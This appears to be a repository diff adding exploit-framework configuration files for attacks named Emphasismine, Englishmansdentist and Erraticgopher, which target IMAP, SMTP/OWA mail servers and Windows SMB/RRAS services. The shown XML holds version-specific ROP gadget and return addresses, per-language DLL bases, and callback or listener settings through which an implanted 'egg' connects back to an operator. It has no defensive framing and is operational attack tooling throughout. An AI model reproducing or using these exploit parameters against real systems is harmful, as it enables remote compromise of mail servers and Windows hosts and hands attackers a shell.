<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60630e48</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015db64</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x42a146</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x4050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x4050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x4140c8</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP1" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606311b8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015dbd4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631f08</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015d2d4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP3" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a831</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042e761</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d388</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631058</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c0c4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a2a6</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041413c</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP4" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a7d1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041dc67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c284</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a240</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004140dc</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1FP5" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a7d1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041dc67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d328</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x620aa96d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60631a78</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6015c654</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a240</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050af</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004140dc</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042AA81</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041DF07</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042D66C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60DDE56B</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60692948</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6014a394</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A4F2</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405227</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040522F</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x004142AC</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
</paramchoice>
|
||||
|
||||
<!-- All plugins that accept a callback must have the Callback* parameters listed below, or their equivalents. -->
|
||||
|
||||
<!-- Callback/Callin parameters -->
|
||||
<paramchoice name="Direction" description="Callback from target or Callin to target">
|
||||
<default>Callback</default>
|
||||
<paramgroup name="Callback" description="Target calls back to plugin">
|
||||
<parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
|
||||
<parameter name="CallbackPort" description="Callback port" type="TcpPort" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
|
||||
</paramgroup>
|
||||
<paramgroup name="Callin" description="Target waits for call from plugin">
|
||||
<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
|
||||
<parameter name="ListenLocalPort" description="Port we connect to" type="TcpPort" required ="false"/>
|
||||
<parameter name="ListenWait" description="Timeout to wait before trying to connect in." type="S16">
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
|
||||
|
||||
</inputparameters>
|
||||
|
||||
<outputparameters>
|
||||
<paramchoice name="Contract"
|
||||
description="The contract fulfilled by this plugin">
|
||||
<value>StagedUpload</value>
|
||||
<paramgroup name="StagedUpload" description="">
|
||||
<parameter name="ConnectedTcp"
|
||||
description="The connected socket"
|
||||
type="Socket"/>
|
||||
<parameter name="XorMask"
|
||||
description="Masking byte"
|
||||
type="U8"/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</outputparameters>
|
||||
|
||||
<redirection>
|
||||
<!-- This is the tunnel used when we're "throwing" the exploit from the ROC -->
|
||||
<local
|
||||
protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="TargetIp"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
<!-- This is the tunnel used when we're "calling in" from the ROC to the exploited machine -->
|
||||
<local
|
||||
protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="ListenLocalPort"
|
||||
destaddr="TargetIp"
|
||||
destport="ListenPort"
|
||||
closeoncompletion="false"/>
|
||||
<!-- This is the tunnel we use when the exploit, after completing, "calls back" to the ROC -->
|
||||
<remote
|
||||
protocol="Tcp"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</redirection>
|
||||
|
||||
|
||||
<logic>
|
||||
<service name="imap">
|
||||
<bindtopath name="TargetPort" path="//service[name='imap']/port"/>
|
||||
</service>
|
||||
<bindtopath name="TargetIp" path="//identifier"/>
|
||||
</logic>
|
||||
</config>
|
||||
BIN
windows/exploits/Emphasismine-3.4.0.exe
Normal file
BIN
windows/exploits/Emphasismine-3.4.0.exe
Normal file
Binary file not shown.
7
windows/exploits/Emphasismine-3.4.0.fb
Normal file
7
windows/exploits/Emphasismine-3.4.0.fb
Normal file
|
|
@ -0,0 +1,7 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
|
||||
name="Emphasismine"
|
||||
version="3.4.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
</t:config>
|
||||
8
windows/exploits/Englishmansdentist-1.2.0.0.fb
Normal file
8
windows/exploits/Englishmansdentist-1.2.0.0.fb
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="2f4f9295a93af5a5e72580a71fc3832efd6cbdf1"
|
||||
name="Englishmansdentist"
|
||||
version="1.2.0"
|
||||
configversion="1.2.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
</t:config>
|
||||
137
windows/exploits/Englishmansdentist-1.2.0.0.xml
Normal file
137
windows/exploits/Englishmansdentist-1.2.0.0.xml
Normal file
|
|
@ -0,0 +1,137 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="2f4f9295a93af5a5e72580a71fc3832efd6cbdf1"
|
||||
name="Englishmansdentist"
|
||||
version="1.2.0"
|
||||
configversion="1.2.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:inputparameters>
|
||||
|
||||
|
||||
<!-- All plugins that accept a callback must have the Callback* parameters
|
||||
listed below, or their equivalents. -->
|
||||
|
||||
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
|
||||
<t:parameter name="TargetPort" description="Target SMTP Mail Port to send email (typically 25)" type="TcpPort" default="25"/>
|
||||
|
||||
<!-- Add TargetEmailAddressValue, EmailSubjectValue, EmailFromAddressValue, EmailBodyValue back in -->
|
||||
<t:parameter name="TargetEmailAddressValue" type="String" description="Target Email Address"/>
|
||||
<t:parameter name="EmailSubjectValue" type="String" description="Email Subject (make unique for later email deletion)"/>
|
||||
<t:parameter name="EmailFromAddressValue" type="String" description="Email From Address" default=""/>
|
||||
<t:parameter name="EmailBodyValue" type="String" description="Email Body" default=""/>
|
||||
|
||||
<!-- Now using dbghelp.dll base addresses which are language dependent -->
|
||||
<t:paramchoice name="Language" description="Target OS Language">
|
||||
<t:paramgroup name="English" description="English OS Language">
|
||||
<t:parameter name="DBGHELP" description="" type="U32" value="0x6d580000" hidden="true"/>
|
||||
<t:parameter name="OLECNV32" description="" type="U32" value="0x71db0000" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="German" description="German OS Language">
|
||||
<t:parameter name="DBGHELP" description="" type="U32" value="0x6d790000" hidden="true"/>
|
||||
<t:parameter name="OLECNV32" description="" type="U32" value="0x71bc0000" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Korean" description="Korean OS Language">
|
||||
<t:parameter name="DBGHELP" description="" type="U32" value="0x6d8e0000" hidden="true"/>
|
||||
<t:parameter name="OLECNV32" description="" type="U32" value="0x71c50000" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Simplified_Chinese" description="Simplified Chinese OS Language">
|
||||
<t:parameter name="DBGHELP" description="" type="U32" value="0x6d830000" hidden="true"/>
|
||||
<t:parameter name="OLECNV32" description="" type="U32" value="0x71d00000" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Traditional_Chinese" description="Traditional Chinese OS Language">
|
||||
<t:parameter name="DBGHELP" description="" type="U32" value="0x6d840000" hidden="true"/>
|
||||
<t:parameter name="OLECNV32" description="" type="U32" value="0x71d10000" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
|
||||
<!-- Added next set of parameters outside of TargetExch since exchange version no longer matters -->
|
||||
<t:parameter name="dbghelp_return_01a0" description="" type="U32" value="0x00081cfd" hidden="true"/>
|
||||
<t:parameter name="dbghelp_virtual_alloc" description="" type="U32" value="0x00001104" hidden="true"/>
|
||||
<t:parameter name="dbghelp_pop_into_ecx" description="" type="U32" value="0x00019568" hidden="true"/>
|
||||
<t:parameter name="dbghelp_pop_into_esi" description="" type="U32" value="0x00013b71" hidden="true"/>
|
||||
<t:parameter name="dbghelp_mov_ptrecx_to_eax_ret" description="" type="U32" value="0x0005c464" hidden="true"/>
|
||||
<t:parameter name="dbghelp_mov_ecx_to_ptreax_ret8" description="" type="U32" value="0x00063f8b" hidden="true"/>
|
||||
<t:parameter name="dbghelp_jmp_eax" description="" type="U32" value="0x0002f71d" hidden="true"/>
|
||||
|
||||
|
||||
<t:parameter name="CallbackIp" description="Callback IP Address" type="IPv4"/>
|
||||
|
||||
<t:parameter name="CallbackPort" description="Callback Port" type="TcpPort" default="0"/>
|
||||
|
||||
<!-- Added CallbackLocalPort for redirection -->
|
||||
<t:parameter name="CallbackLocalPort" description="Local Callback Port" type="TcpPort" required="false"/>
|
||||
|
||||
<t:parameter name="NetworkTimeout" description="Network Timeout (seconds). Use -1 for no timeout." type="S16" default="60"/>
|
||||
|
||||
<!-- Added parameters independent of auth mode since everything must be authenticated -->
|
||||
<t:parameter name="TargetUserName" description="Username of Target Email Account" type="String"/>
|
||||
<t:parameter name="TargetUserPassword" description="Password of Target Email Account" type="String"/>
|
||||
|
||||
<t:paramchoice name="MailCheckProtocol" description="Protocol to Trigger Target's Exploited Email">
|
||||
<t:paramgroup name="POP3" description="">
|
||||
<t:parameter name="MailCheckPort" description="Target POP3 Port" type="TcpPort" default="110"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="IMAP" description="">
|
||||
<t:parameter name="MailCheckPort" description="Target IMAP Port" type="TcpPort" default="143"/>
|
||||
</t:paramgroup>
|
||||
|
||||
<!-- Parameters for OWA -->
|
||||
<t:paramgroup name="OWA" description="">
|
||||
<t:paramchoice name="OWAMode" description="Protocol to Trigger Target's OWA mail" default="HTTPS">
|
||||
<t:paramgroup name="HTTP" description="Use HTTP only for OWA">
|
||||
<t:parameter name="MailCheckPort" description="Target OWA Port" type="TcpPort" default="80"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="HTTPS" description="Use HTTPS only for OWA">
|
||||
<t:parameter name="MailCheckPort" description="Target OWA Port" type="TcpPort" default="443"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:parameter name="OWADelay"
|
||||
description="Delay in milliseconds between each OWA HTTP request"
|
||||
type="S16"
|
||||
default="3000"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:parameter name="AuthCode" description="Egg Authentication Code (typically, don't change)" type="U32" default="0"/>
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:parameter name="Contract"
|
||||
description="Contract Fulfilled by This Plugin"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
|
||||
<!-- Added next three parameters per Jake -->
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to Target"
|
||||
type="Socket"/>
|
||||
<t:parameter name="AuthCode"
|
||||
description="Egg Authentication Code"
|
||||
type="U32"/>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='smtp']/port"
|
||||
closeoncompletion="true"/>
|
||||
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="MailCheckPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='pop3_imap_owa']/port"
|
||||
closeoncompletion="true"/>
|
||||
|
||||
<t:remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
|
||||
</t:redirection>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Englishmansdentist-1.2.0.exe
Normal file
BIN
windows/exploits/Englishmansdentist-1.2.0.exe
Normal file
Binary file not shown.
26
windows/exploits/Erraticgopher-1.0.1.0.fb
Normal file
26
windows/exploits/Erraticgopher-1.0.1.0.fb
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="690f669b2682fb96513cc33c5d6e7f8016081e63"
|
||||
name="Erraticgopher"
|
||||
version="1.0.1"
|
||||
configversion="1.0.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Rpctouch"
|
||||
displayname="RPC Touch"
|
||||
description="Touch to get Target OS"
|
||||
postmessage="ERGO requires Target OS">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
|
||||
<t:iparam name="Protocol" value="SMB"/>
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
</t:plugin>
|
||||
<t:plugin name="Erraticgophertouch"
|
||||
displayname="ERGO Vulnerability Touch"
|
||||
postmessage="ERGO requires a vulnerable OS">
|
||||
<t:ivparam name="TargetPort" value="TargetPort"/>
|
||||
<t:ivparam name="TargetIp" value="TargetIp"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
223
windows/exploits/Erraticgopher-1.0.1.0.xml
Normal file
223
windows/exploits/Erraticgopher-1.0.1.0.xml
Normal file
|
|
@ -0,0 +1,223 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="690f669b2682fb96513cc33c5d6e7f8016081e63"
|
||||
name="Erraticgopher"
|
||||
version="1.0.1"
|
||||
configversion="1.0.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:inputparameters>
|
||||
<t:parameter name="TargetIp"
|
||||
xdevmap="TARGET_IP_V4_ADDRESS"
|
||||
description="Target IP Address"
|
||||
type="IPv4"/>
|
||||
|
||||
<t:parameter name="TargetPort"
|
||||
xdevmap="TARGET_PORT"
|
||||
description="Target port"
|
||||
type="TcpPort"
|
||||
default="445"/>
|
||||
|
||||
<t:paramchoice
|
||||
name="ConnectionDirection"
|
||||
xdevmap="TARGET_CONNECTION_DIRECTION"
|
||||
description="Egg callback (Reverse callback) or Listener (Forward callback)"
|
||||
default="0">
|
||||
<t:paramgroup name="0" description="Reverse callback">
|
||||
<t:parameter name="CallbackIp"
|
||||
xdevmap="EXPLOIT_CALLBACK_IP_V4_ADDRESS"
|
||||
description="Callback IP Address"
|
||||
type="IPv4"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="1" description="Forward callback">
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:parameter name="CallbackPort"
|
||||
xdevmap="EXPLOIT_CALLBACK_PORT"
|
||||
description="Callback port or call in port"
|
||||
type="TcpPort"/>
|
||||
|
||||
|
||||
<t:paramchoice
|
||||
name="Target"
|
||||
xdevmap="TARGET_PLATFORM"
|
||||
description="Target Operating System Version">
|
||||
<!-- 2000 SP4 - Doesn't appear to allow access to Dimsvc over the 'browser' pipe, only over the 'router'
|
||||
pipe. So the interface will only be reachable with credentials. Exploit does not currently support
|
||||
credential use.
|
||||
<t:paramgroup name="WIN2K_SP4" description="Windows 2000 SP4">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0x28" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x06D0" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x00E0" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x7CA0C02F" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
-->
|
||||
<!-- XP SP2 - Can't find the lock handle on the stack to cleanup, so exploiting will disable RRAS service.
|
||||
One option would be to patch in the location of the lock, but that is language dependent. Probably
|
||||
not too many XP SP2 RRAS boxes out there, so leaving it.
|
||||
<t:paramgroup name="WINXP_SP2" description="Windows XP SP2">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0xE4" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0x0FFD0000" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x06D0" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x019C" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x000134D3" hidden="true"/>
|
||||
<t:parameter name="RwAddress" description="" type="U32" value="0x00024588" hidden="true"/>
|
||||
<t:parameter name="ZeroEax" description="" type="U32" value="0x0001095F" hidden="true"/>
|
||||
<t:parameter name="MovEspEax" description="" type="U32" value="0x000135E8" hidden="true"/>
|
||||
<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00010278" hidden="true"/>
|
||||
<t:parameter name="SkipJunk" description="" type="U32" value="0x00014502" hidden="true"/>
|
||||
<t:parameter name="SkipJunkPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
|
||||
<t:parameter name="GetVProtIndex" description="" type="U32" value="0x0000A08D" hidden="true"/>
|
||||
<t:parameter name="vProtIndex" description="" type="U32" value="0x00000089" hidden="true"/>
|
||||
<t:parameter name="vProtPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
|
||||
<t:parameter name="SetupEbx" description="" type="U32" value="0x00014505" hidden="true"/>
|
||||
<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
|
||||
<t:parameter name="JumpEbx" description="" type="U32" value="0x00014D7C" hidden="true"/>
|
||||
<t:parameter name="JumpEbxPadding" description="" type="U32" value="0x00000010" hidden="true"/>
|
||||
<t:parameter name="Ret14" description="" type="U32" value="0x000069A8" hidden="true"/>
|
||||
<t:parameter name="JumpEsp" description="" type="U32" value="0x00018F89" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
-->
|
||||
<t:paramgroup name="XPSP3" description="Windows XP SP3">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0xE4" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x0690" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x0190" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00014E7A" hidden="true"/>
|
||||
<t:parameter name="RwAddress" description="" type="U32" value="0x00032020" hidden="true"/>
|
||||
<t:parameter name="ZeroEax" description="" type="U32" value="0x000121DE" hidden="true"/>
|
||||
<t:parameter name="MovEspEax" description="" type="U32" value="0x00014F88" hidden="true"/>
|
||||
<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x0001137E" hidden="true"/>
|
||||
<t:parameter name="SkipJunk" description="" type="U32" value="0x00015EA3" hidden="true"/>
|
||||
<t:parameter name="SkipJunkPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
|
||||
<t:parameter name="GetVProtIndex" description="" type="U32" value="0x0000A965" hidden="true"/>
|
||||
<t:parameter name="vProtIndex" description="" type="U32" value="0x00000089" hidden="true"/>
|
||||
<t:parameter name="vProtPadding" description="" type="U32" value="0x0000000C" hidden="true"/>
|
||||
<t:parameter name="SetupEbx" description="" type="U32" value="0x00015EA5" hidden="true"/>
|
||||
